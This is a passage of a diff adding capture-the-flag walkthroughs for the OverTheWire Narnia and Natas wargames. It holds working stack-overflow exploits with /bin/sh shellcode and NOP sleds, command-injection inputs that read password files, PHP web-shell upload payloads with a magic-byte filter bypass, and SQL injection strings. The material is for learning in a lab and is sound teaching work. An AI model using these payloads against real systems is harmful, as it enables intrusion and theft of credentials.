+ +``` +narnia2@melinda:/narnia$ ./narnia2 +Usage: ./narnia2 argument +narnia2@melinda:/narnia$ cat narnia2.c +#include +#include +#include + +int main(int argc, char * argv[]){ + char buf[128]; + + if(argc == 1){ + printf("Usage: %s argument\n", argv[0]); + exit(1); + } + strcpy(buf,argv[1]); + printf("%s", buf); + + return 0; +} +``` + +This function copies an input string to a *buf*, using ```strcpy()``` (instead of safer ```strncpy()```). Since there is no bounds checking, *buf* overflows to the higher address in the Stack if the input is larger than 128 bytes. + +In this problem, we will use overflow to take control of the return address of the main function, which is right after *buf*. We will overwrite this to any address we want, for example to the address of a beautifully crafted exploit. + + +### Step 2: Finding the Frame Size + +To find where the returning address of this function is located, we use *gdb*: + +```sh +narnia2@melinda:/narnia$ gdb ./narnia2 +(gdb) set disassembly-flavor intel +(gdb) disas main +Dump of assembler code for function main: + 0x08048424 <+0>: push ebp + 0x08048425 <+1>: mov ebp,esp + 0x08048427 <+3>: and esp,0xfffffff0 + 0x0804842a <+6>: sub esp,0x90 + 0x08048430 <+12>: cmp DWORD PTR [ebp+0x8],0x1 + 0x08048434 <+16>: jne 0x8048458 + 0x08048436 <+18>: mov eax,DWORD PTR [ebp+0xc] + 0x08048439 <+21>: mov edx,DWORD PTR [eax] + 0x0804843b <+23>: mov eax,0x8048560 + 0x08048440 <+28>: mov DWORD PTR [esp+0x4],edx + 0x08048444 <+32>: mov DWORD PTR [esp],eax + 0x08048447 <+35>: call 0x8048320 + 0x0804844c <+40>: mov DWORD PTR [esp],0x1 + 0x08048453 <+47>: call 0x8048350 + 0x08048458 <+52>: mov eax,DWORD PTR [ebp+0xc] + 0x0804845b <+55>: add eax,0x4 + 0x0804845e <+58>: mov eax,DWORD PTR [eax] + 0x08048460 <+60>: mov DWORD PTR [esp+0x4],eax + 0x08048464 <+64>: lea eax,[esp+0x10] + 0x08048468 <+68>: mov DWORD PTR [esp],eax + 0x0804846b <+71>: call 0x8048330 + 0x08048470 <+76>: mov eax,0x8048574 + 0x08048475 <+81>: lea edx,[esp+0x10] + 0x08048479 <+85>: mov DWORD PTR [esp+0x4],edx + 0x0804847d <+89>: mov DWORD PTR [esp],eax + 0x08048480 <+92>: call 0x8048320 + 0x08048485 <+97>: mov eax,0x0 + 0x0804848a <+102>: leave + 0x0804848b <+103>: ret +End of assembler dump. +``` + +We create a breakpoint right before the exit: + +``` +(gdb) b *main+97 +Breakpoint 1 at 0x8048485 +``` + +We run our program, feeding it with an argument of size 30 and we look to the memory (esp is the Stack pointer). The second value, **0xffffd610**, indicates the start of the frame: +``` +(gdb) r `python -c 'print "B"*30'` +(gdb) x/30xw $esp +0xffffd600: 0x08048574 0xffffd610 0x00000001 0xf7ebf729 +0xffffd610: 0x42424242 0x42424242 0x42424242 0x42424242 +0xffffd620: 0x42424242 0x42424242 0x42424242 0xf7004242 +0xffffd630: 0x08048258 0x00000000 0x00ca0000 0x00000001 +0xffffd640: 0xffffd86d 0x0000002f 0xffffd69c 0xf7fcaff4 +0xffffd650: 0x08048490 0x08049750 0x00000002 0x080482fd +0xffffd660: 0xf7fcb3e4 0x00008000 0x08049750 0x080484b1 +0xffffd670: 0xffffffff 0xf7e59d46 +``` + +Now, looking to the information about the frame, we get the return address at **0xffffd69c**: + +``` +(gdb) i f +Stack level 0, frame at 0xffffd6a0: + eip = 0x8048485 in main; saved eip 0xf7e404b3 + Arglist at 0xffffd698, args: + Locals at 0xffffd698, Previous frame's sp is 0xffffd6a0 + Saved registers: + ebp at 0xffffd698, eip at 0xffffd69c +``` + +To find the size of the frame we subtract these values: + +``` +(gdb) p 0xffffd69c-0xffffd610 +$1 = 140 +``` + +So we know that 140 bytes are needed to reach the return address, where we will add our pointer. + + + +### Step 3: Finding the EGG ShellCode Address + +Where do we want to point the return address to? Well, we already know a way to spawn a shell: using an environment variable: + +```sh +narnia2@melinda:/tmp$ export EGG=`python -c'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80"' +``` + +To find the address of **EGG** we use the following **C** code: +```c +narnia2@melinda:/tmp$ cat getbashadd.c +#include +#include +#include + +int main(int argc,char *argv[]){ + char *ptr; + ptr = getenv(argv[1]); + ptr += (strlen(argv[0])-strlen(argv[2]))*2; + printf("%s is at %p\n", argv[1],ptr); + return 0; +} +``` + +Running it gives: + +``` +narnia2@melinda:/tmp$ ./getshadd EGG /narnia/narnia2 +EGG will be at 0xffffd945 +``` + +### Step 4: Running the Exploit! + +Now all we need to do is to run the binary with 140 bytes of junk plus the address that we want to point the return address to: + +```sh +narnia2@melinda:/tmp/ya2$ /narnia/narnia2 `python -c 'print "A"*140 + "\x45\xd9\xff\xff"'` +$ whoami +narnia3 +``` + + +------ + +## Level 3: Stack Overflow, Files, and Symbolic Links + +### Step 1: Understanding the Problem + +The fourth level starts with: + +```sh +narnia3@melinda:/narnia$ ./narnia3 +usage, ./narnia3 file, will send contents of file 2 /dev/null +narnia3@melinda:/narnia$ cat narnia3.c +#include +#include +#include +#include +#include +#include +#include + +int main(int argc, char **argv){ + + int ifd, ofd; + char ofile[16] = "/dev/null"; + char ifile[32]; + char buf[32]; + + if(argc != 2){ + printf("usage, %s file, will send contents of file 2 /dev/null\n",argv[0]); + exit(-1); + } + + /* open files */ + strcpy(ifile, argv[1]); + if((ofd = open(ofile,O_RDWR)) < 0 ){ + printf("error opening %s\n", ofile); + exit(-1); + } + if((ifd = open(ifile, O_RDONLY)) < 0 ){ + printf("error opening %s\n", ifile); + exit(-1); + } + + /* copy from file1 to file2 */ + read(ifd, buf, sizeof(buf)-1); + write(ofd,buf, sizeof(buf)-1); + printf("copied contents of %s to a safer place... (%s)\n",ifile,ofile); + + /* close 'em */ + close(ifd); + close(ofd); + + exit(1); +} +``` + +This program receives a file name as input, and then copies the content of this file to a second file pointing to ```/dev/null```. + +What is particularly interesting to us is the order that the variables are declared: + +```c +char ofile[16] = "/dev/null"; +char ifile[32]; +``` + + +[/dev/null]: http://en.wikipedia.org/wiki/Null_device + + +### Step 2: Understanding what is going on in the Memory + +Let's debug this binary to see how we can exploit it. First with a simple 3-bytes input: + +``` +(gdb) set args "`python -c 'print "a"*3'`" +(gdb) r +Starting program: /games/narnia/narnia3 "`python -c 'print "a"*3'`" +error opening aaa +``` + +OK, it makes sense, there is no such file. Now let's try the size of *ifile*: + +``` +(gdb) set args "`python -c 'print "a"*32'`" +(gdb) r +Starting program: /games/narnia/narnia3 "`python -c 'print "a"*32'`" +error opening +``` + +Mmm, interesting. It does not input any name. Let's try one byte less: + +``` +(gdb) set args "`python -c 'print "a"*31'`" +(gdb) r +Starting program: /games/narnia/narnia3 "`python -c 'print "a"*31'`" +error opening aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +``` + +The previous example showed the first byte after overflowing *ifile*. This last example ends in the last possible byte in the array. Once we overflow *ifile*, it skips the checking, going straight to check whether *ofile* is a valid name. Awesome! + + + +### Step 3: Writing and Applying the Exploit + +We want two things happening in *ifile*: first, to read the password file, then to overflows *ofile*, making it point to a file we have access to read. + +The best way to put all of this in one input name is by creating a symbolic link with the following rules: + +1. Point to */etc/narnia_pass/narnia4*. +2. Fill the 32 bytes of the *ifile* array with junk. +3. End with some file name which we had created before, and we have permission to read (we can just use ```touch``` to create an empty file). + +The result, for a file name *out*, is: +```sh +$ ln -s /etc/narnia_pass/narnia4 $(python -c "print 'A'*32 + 'out'") +``` + +Now we can just run it and retrieve our password: +```sh +narnia3@melinda:/tmp$ /narnia/narnia3 `python -c "print 'A'*32 + 'out'"`copied contents of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAout to a safer place... (out) +narnia3@melinda:/tmp$ cat out +``` + + + + + +_______ + + +## Level 4: Classic Buffer Overflow with NOP + +### Step 1: Understanding the Problem + +This fifth level starts with: + +```sh +narnia4@melinda:/narnia$ ./narnia4 +narnia4@melinda:/narnia$ cat narnia4.c + +#include +#include +#include +#include + +extern char **environ; + +int main(int argc,char **argv){ + int i; + char buffer[256]; + + for(i = 0; environ[i] != NULL; i++) + memset(environ[i], '\0', strlen(environ[i])); + + if(argc>1) + strcpy(buffer,argv[1]); + + return 0; +} +``` + +This binary does three things: first, it creates a buffer array of size 256, then it makes all of the system environment variables equal to zero, and then it copies whatever user input it had to the buffer. + +The reason why this code clears the environment variables is to avoid the possibility of us placing a shellcode exploit to them (like we did in Level 2). + + + +### Step 2: Outlining the Attack + + +To exploit this binary we are going to overwrite our **return address** like in level 2, but this time we can't use an external address to point to. However, since our Stack is executable, we can place the shellcode in the Stack. The steps we follow are: + +1. Find out the size of the Stack. Just having the return address won't help since we can't point it to anywhere outside the code. +2. Create a shellcode with the return address minus some value we define so that the return address points to somewhere inside the Stack. +3. Fill the beginning of the Stack with lots of [NOPs] (No Operations, used to pad/align bytes or to delay time), which in the x86 CPU family is represented with ```0x90```. If the pointer hits these places, it just keeps advancing until it finds our shell. +4. To make everything fit right in the Stack frame, we pad the end of the shellcode with junk. +. + +[ASLR]: http://en.wikipedia.org/wiki/Address_space_layout_randomization +[NOPs]: http://en.wikipedia.org/wiki/NOP + + + + +### Step 3: Getting the Frame Size + + +With gdb we can extract the relevant memory locations. Let's run our program with an input of the size of the buffer. Here we use the flag ```--args``` because otherwise we will get an error that the name is too long: + +```sh +narnia4@melinda:/narnia$ gdb --args narnia4 `python -c "print 'A'*256"` +Reading symbols from /games/narnia/narnia4...(no debugging symbols found)...done. +(gdb) set disassembly-flavor intel +(gdb) disas main +Dump of assembler code for function main: + 0x08048444 <+0>: push ebp + 0x08048445 <+1>: mov ebp,esp + 0x08048447 <+3>: push edi + 0x08048448 <+4>: and esp,0xfffffff0 + 0x0804844b <+7>: sub esp,0x130 +(..) + 0x080484f0 <+172>: call 0x8048350 + 0x080484f5 <+177>: mov eax,0x0 + 0x080484fa <+182>: mov edi,DWORD PTR [ebp-0x4] + 0x080484fd <+185>: leave + 0x080484fe <+186>: ret +End of assembler dump. +``` + +We put a breakpoint right before the Stack ends: + +```sh +(gdb) b *main+182 +Breakpoint 1 at 0x80484fa +``` + +Running: + +```sh +(gdb) r +Starting program: /games/narnia/narnia4 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +``` + +We see that the frame starts at **0xffffd4cc**: + +```sh +(gdb) x/90xw $esp +0xffffd4a0: 0xffffd4cc 0xffffd7be 0x00000021 0xf7ff7d54 +0xffffd4b0: 0xf7e2ae38 0x00000000 0x00000026 0xffffffff +0xffffd4c0: 0x00000000 0x00000000 0x00000001 0x41414141 +0xffffd4d0: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd4e0: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd4f0: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd500: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd510: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd520: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd530: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd540: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd550: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd560: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd570: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd580: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd590: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd5a0: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd5b0: 0x41414141 0x41414141 0x41414141 0x41414141 +0xffffd5c0: 0x41414141 0x41414141 0x41414141 0x00000000 +0xffffd5d0: 0x08048500 0x00000000 0x00000000 0xf7e404b3 +0xffffd5e0: 0x00000002 0xffffd674 0xffffd680 0xf7fcf000 +0xffffd5f0: 0x00000000 0xffffd61c 0xffffd680 0x00000000 +0xffffd600: 0x0804824c 0xf7fcaff4 +``` + +Taking a look at the information of the frame gives us the return address, from which we find the size of the Stack: + +```sh +(gdb) i f +Stack level 0, frame at 0xffffd5e0: + eip = 0x80484fa in main; saved eip 0xf7e404b3 + Arglist at 0xffffd5d8, args: + Locals at 0xffffd5d8, Previous frame's sp is 0xffffd5e0 + Saved registers: + ebp at 0xffffd5d8, edi at 0xffffd5d4, eip at 0xffffd5dc +(gdb) p 0xffffd5dc-0xffffd4cc +$1 = 272 +``` + + + +### Step 4: Writing and Applying the Exploit + +We know that the Stack has a size of 272 bytes and that the return address is **0xffffd5dc**. If we add the return address, it sums to 276. + +Now we have some freedom to choose where to place our shellcode. Let's say, we place it somewhere in the middle, say, at the position 134. In the memory, we get: ```0xffffd5cc - 134 = 0xffffd546```. + +Since 276 minus 134 is 142, if we point the return address to **0xffffd546**, it will go to the 142th position in the Stack and execute whatever is there. We want to make sure that the return address will always end in the shellcode address and for this reason, we fill the addresses around with NOPs. + + +We will borrow the shellcode from the previous levels, which has size of 25 bytes: + +``` +\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80 +``` + +Considering the values above, we can write the following exploit: + +``` +`python -c "print '\x90'*142 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80' + 'A'*105 + '\x46\xd5\xff\xff'"` +``` + +We could have used another address to craft another version of the exploit. Then we would have to simply adjust our NOPs and our paddings. For example, ```0xffffd5cc - 120 = 0xffffd554```: + +``` +`print -c "'\x90'*156 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80' + 'A'*91 + '\x54\xd5\xff\xff'" ` +``` + +They both work. + +We finally apply our exploit: +``` +narnia4@melinda:/tmp$ python -c "print '\x90'*156 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80' + 'A'*91 + '\x54\xd5\xff\xff'" +������������������������������������������������������������������������������������������������������������������������������������������������������������1�Ph//shh/bin��P��P��� + AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT��� +narnia4@melinda:/tmp$ /narnia/narnia4 `python -c "print '\x90'*156 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80' + 'A'*91 + '\x54\xd5\xff\xff'"` +$ whoami +narnia5 +``` diff --git a/CTFs_and_WarGames/WARGAMES/natas.md b/CTFs_and_WarGames/WARGAMES/natas.md new file mode 100644 index 0000000..341ca2b --- /dev/null +++ b/CTFs_and_WarGames/WARGAMES/natas.md @@ -0,0 +1,1432 @@ +# Exploiting the Web in 20 Lessons (Natas) + + +[Natas]: http://overthewire.org/wargames/natas/ + + +---- + +## No scripting required + +### Level 0 and 1: Simple source code inspection + +The first two levels start with a simple HTML page. No hints. + +The first thing we do is to take a look at the source code. + +In the 0th level, the password is straight from the there. + + +In the first level, we need to disable **JavaScript** so you can right click it: + +```html + +``` + +Too easy. + + +### Level 2: Source code inspection for directories + + +Looking at the source code in the second level reveals: + +```html +There is nothing on this page + +``` + +Well, this gives us a hint about the folder **files**. + +Taking a look at: + +> http://natas2.natas.labs.overthewire.org/files/ + + +gives a file ```users.txt``` with the password. + + + + +### Level 3: Robots.txt + +Looking at the source code, we see this comment: + +``` + +``` + +In general, websites use a file called **[robots.txt]** to tell search engines what should be indexed. + +Looking at: + +> http://natas3.natas.labs.overthewire.org/robots.txt + +[robots.txt]: http://en.wikipedia.org/wiki/Robots_exclusion_standard + + +We find: + +``` +User-agent: * +Disallow: /s3cr3t/ +``` + +Looking at the content of the folder */s3cr3t/* revels: + +``` +Index of /s3cr3t + +[ICO] Name Last modified Size Description +[DIR] Parent Directory - +[TXT] users.txt 12-Jul-2013 13:35 40 +``` + +Which give us the password file: + +> http://natas3.natas.labs.overthewire.org/s3cr3t/users.txt + + + + +### Level 4: Changing the referer tag + +In this level, the front page shows this message: + +```html +Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/index.php" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/" +
+ +``` + +The server thinks we are coming from a page that is indicated in the **[referer]** tag in the headers. + +The referer is a (historically misspelled) tag that carries the address of the URL that linked to the address we are requesting. + + +There are many ways to tamper this. While we could use browser plugins such as [tampermonkey] or [modify-headers], the good old **curl** do it quickly: + +[referer]: http://en.wikipedia.org/wiki/HTTP_referer + + +```sh +$ curl --user natas4:************************ http://natas4.natas.labs.overthewire.org/index.php --referer "http://natas5.natas.labs.overthewire.org/" +``` + + +[tampermonkey]: https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en +[modify-headers]: https://chrome.google.com/webstore/detail/modify-headers-for-google/innpjfdalfhpcoinfnehdnbkglpmogdi?hl=en-US + + + +### Level 5: Tampering cookies + +When we log in the 5th level, the front page says: + +``` +Access disallowed. You are not logged in +``` + +Inspecting the source does not give any additional information. + +We check the elements of the page. There is a cookie named *loggedin* with value **0**. What happens if we change it to **1**? + +Using the [edit this cookie] plugin, we are able to edit it and get the next password. + + +[edit this cookie]: http://www.editthiscookie.com/start/ + + + +### Level 6: Source code inspection for directories II + +This level comes with a PHP form. We take a look at the source code: + +```php +"; + } else { + print "Wrong secret"; + } + } +?> +
+Input secret:
+ +
+``` + +Double LOL. + +We just need to inspect that first URL to get the value of *$secret*: + +> http://natas6.natas.labs.overthewire.org/includes/secret.inc + +Submitting this value in the input form gives us the password. + + +### Level 7: Modifying URLs + +This level has the following hint in its PHP source code: + +```html +
+Home +About +
+
+this is the front page + +
+``` + +Another easy one. + +Instead of *page=home* we change it to: + +>page=/etc/natas_webpass/natas8 + +We then get our password at: + +> http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8 + + + +### Level 8: String decoding + +This level comes with a PHP form, similar to the 6th level. We take a look at the code source: + +```php +"; + } else { + print "Wrong secret"; + } +} +?> +``` + +Simple. The secret is encoded in some obscuration. Funny enough, it uses the PHP function [strrev] to reverse the string. + +We perform the following operations to recover the variable *$secret* from the variable *$encodedSecret*: + +I - Decode hexadecimal to binary (*bin2hex*): + +```python +>>> SECRET.decode('hex') +'==QcCtmMml1ViV3b' +``` + + +II - Reverse the string (*strrev*): + +```python +>>> SECRET.decode('hex')[::-1] +'b3ViV1lmMmtCcQ==' +``` + +III - Base64 decode (*base64_encode*): + +```python +>>> SECRET.decode('hex')[::-1].decode('base64') +'oubWYf2kBq' +``` + +We submit this last string in the input-form, giving us the password. + + +[strrev]: http://php.net/manual/en/function.strrev.php + + + +------ + +## I'm bored. Can we do something actually cool? + +Yes, we can. + + +### Level 9: OS Command Injection + +This level's page has a search form. If we try to submit a word, for example *secret*, we get several variations of this word: + +![cyber](http://i.imgur.com/ZQwlqsQl.png) + + + +We inspect the source code: + +``` +

natas9

+
+
+Find words containing:

+
+Output: +
+
+
+``` + +If we try inputs such as \*, "", or \n, the query shows the entire list of words inside the file *dictionary.txt*. We tried that, but no password there. + +Taking a closer look to the code, we notice the PHP function [passthru](), which is used to execute an external command. + +Since the variable **$key** is **not sanitized**, we can add a crafted input to it to inject a code that displays the password at the folder */etc/natas_webpass/natas10*. This type of attack is called [OS command injection]. + +What should we add to the original *grep* command? + +In **Bash**, the *semicolon* permits putting more than one command on the same line. Adding a **;** to the input allows us to add a **cat** after that. + +The crafted input is: +``` +; cat /etc/natas_webpass/natas10 +``` +This gives us the password. + + + + +[passthru]: http://php.net/manual/en/function.passthru.php +[OS command injection]: https://www.owasp.org/index.php/OS_Command_Injection + + + + +### Level 10: OS Command Injection II + +This level starts with the same search form from the previous level. However, this time, we get the warning: + +> For security reasons, we now filter on certain characters. + +We take a look at the source code: + +```php +
+
+
+``` + +The difference here is an *if* clause with the function [preg_match]. This function is used to search for a pattern in a string, *i.e.*, it clears the string against the pattern **;**, **|**, and **&**. + +We cannot use the same attack as before with a semicolon! + + +We need to some other injection that does not need those symbols. + +When I was messing around in the previous level, I noticed that we could use **""** as an input. Awesome. The following input reveals the password: + +``` +"" cat /etc/natas_webpass/natas11 +``` + + + +[preg_match]: http://php.net/manual/en/function.preg-match.php + + + + +### Level 11: Cookies and XOR Encryption + +This level starts with an input form to set background color and a message: + +> cookies are protected with XOR encryption + +![cyber](http://i.imgur.com/aD4CKbY.png) + + +Let's inspect the source code in several steps. First, we have this suspicious array: + + +``` +$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff"); +``` + +We will see soon that this array is passed to a cookie as an encrypted XOR string. + +[encrypted XOR string]:http://en.wikipedia.org/wiki/XOR_cipher + + +What happens if we manage to set *showpassword* to *yes*? This is answered in the end of the code: + +``` +if($data["showpassword"] == "yes") { + print "The password for natas12 is
"; +} +``` +We know our way now. + + +We then have this XOR function that takes an input value, *$text*, and XOR to a variable, *$key*. So we know that XORing the output with what we sent as the input can return the content of *$key*: + +``` +function xor_encrypt($in) { + $key = ''; + $text = $in; + $outText = ''; + + // Iterate through each character + for($i=0;$i +Background color: + + +``` + + +Since we know the plaintext, given by the variable *$defaultdata*, all we need is the value in the cookie. With that, we can XOR them and get our password. + +We can use the plugin I described before, [edit this cookie], to get this value: + +``` +ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw +``` + +Now, we write the following script in PHP, modifying the XOR function to take our input: +``` +"no", "bgcolor"=>"#ffffff")); + $outText = ''; + + for($i=0;$i +``` + +Running it returns the XOR key that encrypts the *$defaultdata* variable: +```sh +$ php xor.php +qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq +``` + +The repeated pattern is obviously a key. + +The next step is to modify the value of that variable to have *showpassword* saying *yes*. Then this should be XORerd with the right key in *$key*. + +For that, we created the following script: + +``` +"yes", "bgcolor"=>"#ffffff")); + $key = 'qw8J'; + $outText = ''; + + for($i=0;$i +``` + +This results in the code we need to add to the cookie. We do this through the plugin. Refreshing the page returns our password. + + + + +### Level 12: File Inclusion Attack + + + +This challenge starts with a JPG file uploader: +![cyber](http://i.imgur.com/xcSJ5kr.png) + +Inspecting the source code, we see that the first function returns a random string of length 10: + +``` +function genRandomString() { + $length = 10; + $characters = "0123456789abcdefghijklmnopqrstuvwxyz"; + $string = ""; + for ($p = 0; $p < $length; $p++) { + $string .= $characters[mt_rand(0, strlen($characters)-1)]; + } + return $string; +} +``` + +This string is used as the name of the uploaded file in the server: + +``` +function makeRandomPath($dir, $ext) { + do { + $path = $dir."/".genRandomString().".".$ext; + } while(file_exists($path)); + return $path; +} +function makeRandomPathFromFilename($dir, $fn) { + $ext = pathinfo($fn, PATHINFO_EXTENSION); + return makeRandomPath($dir, $ext); +} +``` + +However, this file's extension is given by the browser: + +``` +
+ + +Choose a JPEG to upload (max 1KB):
+
+ +
+``` + + +Finally, the last function performs the file uploading. Notice that the code does not check whether the file is actually a JPG file: + + +``` +if(array_key_exists("filename", $_POST)) { + $target_path = makeRandomPathFromFilename("upload", $_POST["filename"]); + if(filesize($_FILES['uploadedfile']['tmp_name']) > 1000) { + echo "File is too big"; + } else { + if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { + echo "The file $target_path has been uploaded"; + } else{ + echo "There was an error uploading the file, please try again!"; + } + } +} else { +?> +``` + +#### Stating the attack: + +We still can upload whatever file we want. + +Since the file extension is changed to *jpg* in the browser side, we have control of this; we can easily tamper the POST data. + +First, let's think about the exploit we want to send to the server. Since we know that the server runs PHP, we have several possibilities in this language! + +How about the following script which uses the function [readfile()]? + +``` + +``` + +[readfile()]: http://php.net/manual/en/function.readfile.php + +We could also use a [system] command: + +```php + +``` + +[system]: http://php.net/manual/en/function.system.php + +Or we could even use [passthru] again: + +```php + +``` +Any of these exploits will work. + + + + + +Now, let's work our way around the fact that the browser will attempt to change our script extension from *php* to *jpg*. + +There are several ways to fix this. An easy way is to use a proxy or extension, such as [Burp Suite] or [FireBug] to change the filename before it is sent to the server. + +We use *Burp* and the attack is stated in the following steps: + +1. Our exploit script in PHP is uploaded by the server and renamed with a random string and a *jpg* extension. + +2. We intercept the request and change the name of the file back to the name of the script with *php* extension. + +3. We send it to the server, which calls the function *MakeRandomPathFromFilename("upload","exploit.php")*. This is sent to the function MakeRandomPath('upload', '.php'). + +4. The server returns the link */upload/randomString.php*, which runs our exploit and returns the password. + + +#### Firing up Burp: + +[Burp Suite]: http://portswigger.net/burp/ +[FireBug]: http://getfirebug.com/ + +If this is your first time with Burp, [this is how you run it]. Burp works as an HTTP proxy server, where all HTTP/S traffic from your browser passes through it. I will show in details how to do this in a *nix system. + + +[this is how you run it]: http://portswigger.net/burp/help/suite_gettingstarted.html + +First, we lauch Burp: + +```sh +$ java -jar -Xmx1024m /path/to/burp.jar +``` + +Then we go to the proxy tab and then options, and we confirm Burp's Proxy listener is active at *127.0.0.1:8080*: + +![cyber](http://i.imgur.com/5xkHB29.png) + +We set the proxy configuration in our system to this address: + +![cyber](http://i.imgur.com/Au1Gimm.png) + +Back in Burp, we go to *Proxy --> Intercept* and mark it ON: + +![cyber](http://i.imgur.com/FAf5Hru.png) + +In the browser, we load the Natas12 page and accept the initial intercepts (forwarding it). We upload our exploit. + +Before we forward this request to the server, we open it in Burp and we change the name of the random string in *jpg* to our *php* exploit: + +![cyber](http://i.imgur.com/eywDMOy.png) + + +The browser will return the link for the file: + +![cyber](http://i.imgur.com/SGjbVsy.png) + +Clicking it will reveal the password. + + +### Level 13: File Inclusion Attack II + + + +This level looks like the previous one, except by the message: + +> For security reasons, we now only accept image files! + +We take a look at the source code and the only difference from the previous level's code is an *if* clause: +```php + 1000) { + echo "File is too big"; + } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) { + echo "File is not an image"; + } else { + if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { + echo "The file $target_path has been uploaded"; + } else{ + echo "There was an error uploading the file, please try again!"; + } + } +} else { +?> +``` + +The clause uses the PHP function [exif_imagetype] to check whether the file is an image type. + +The way it works is by checking the first bytes of the image and seeing whether it has an image signature. This signature is known as the [magic number]. Every binary has one. + +It should be obvious that adding the right signature to a file could tamper it to look like another file type. + +#### Crafting the attack: + +We search for an [image magic number]. For *jpg*, it's the hexadecimal *ff d8 ff e0*. For *gif*, however, it's really simple: *GIF89a*. + +Let's use it! + +Adding this number to our script from the previous level, + +``` +GIF89a + +``` + +and following the previous steps, leads to the password for the next level. + + +[exif_imagetype]:http://php.net/manual/en/function.exif-imagetype.php +[magic number]:http://en.wikipedia.org/wiki/List_of_file_signatures +[image magic number]:http://en.wikipedia.org/wiki/Graphics_Interchange_Format + + + +### Level 14: SQL Injection + + + +This level starts with a *username* and *password* form: + +![cyber](http://i.imgur.com/qDA3nCP.png) + +Looking at the source code, we see THE connection to a MySQL server, and a SQL query to look for a record in the database: + +```php +'); + mysql_select_db('natas14', $link); + + $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\""; + if(array_key_exists("debug", $_GET)) { + echo "Executing query: $query
"; + } + + if(mysql_num_rows(mysql_query($query, $link)) > 0) { + echo "Successful login! The password for natas15 is
"; + } else { + echo "Access denied!
"; + } + mysql_close($link); +} else { +?> +``` + +If the query returns one or more row, we get a message with the password for the next level. + +The *GET* in the *if* clause declares the parameter *debug* without checking whether this is a safe query input! + +Therefore, while a simple GET query such as: + +> http://natas14.natas.labs.overthewire.org/index.php?username=admin&password=pass + +returns: + +![cyber](http://i.imgur.com/mWhSVxh.png) + + +A crafted query using [SQL Injection] (SQLi) can return whatever we want :). + +#### Crafting the attack: + +Without any injection, a regular query with words *admin* and *pass* would look like this: +``` +SELECT * from users where username="$(Username)" and password="$(Password)" +``` + +We want to inject stuff in the middle to make this query do *more things*. + +In SQLi, we need to take care of the **"** that is automatically added in the end by the server. The simplest way to do this is by including an **always true clause** at the end of everything. It can be represented by: + +``` +OR '1'='1' +``` + +So, for example, the following query would not give any error: + +``` +SELECT * from users where username="admin" and password="pass" OR "1"="1" +``` + +Now, we need to add stuff before OR! + +When we craft the right URL, we keep in mind that whitespace will be translated to *%20* and **""** will be translated to *%22*. + +Finally, the following URL: + +> http://natas14.natas.labs.overthewire.org/index.php?username=admin&password=pass%22%20OR%20%221%22=%221 + +reveals the password. + + + +[SQL Injection]: https://www.owasp.org/index.php/SQL_Injection + + + +---- + +## Now the Juice: Scripting Attacks + + + +### Level 15: SQL Injection II + + + +This level starts with a form to check the existence of some username: + +![cyber](http://i.imgur.com/SO4K5wK.png) + + The source code is almost equal to the previous level, with the exception of this part: + +``` +/* +CREATE TABLE `users` ( + `username` varchar(64) DEFAULT NULL, + `password` varchar(64) DEFAULT NULL +); +*/ +``` + +And the fact that the *$query* does not have a password part and it is hygienized now: + +``` +if(array_key_exists("username", $_REQUEST)) { + $link = mysql_connect('localhost', 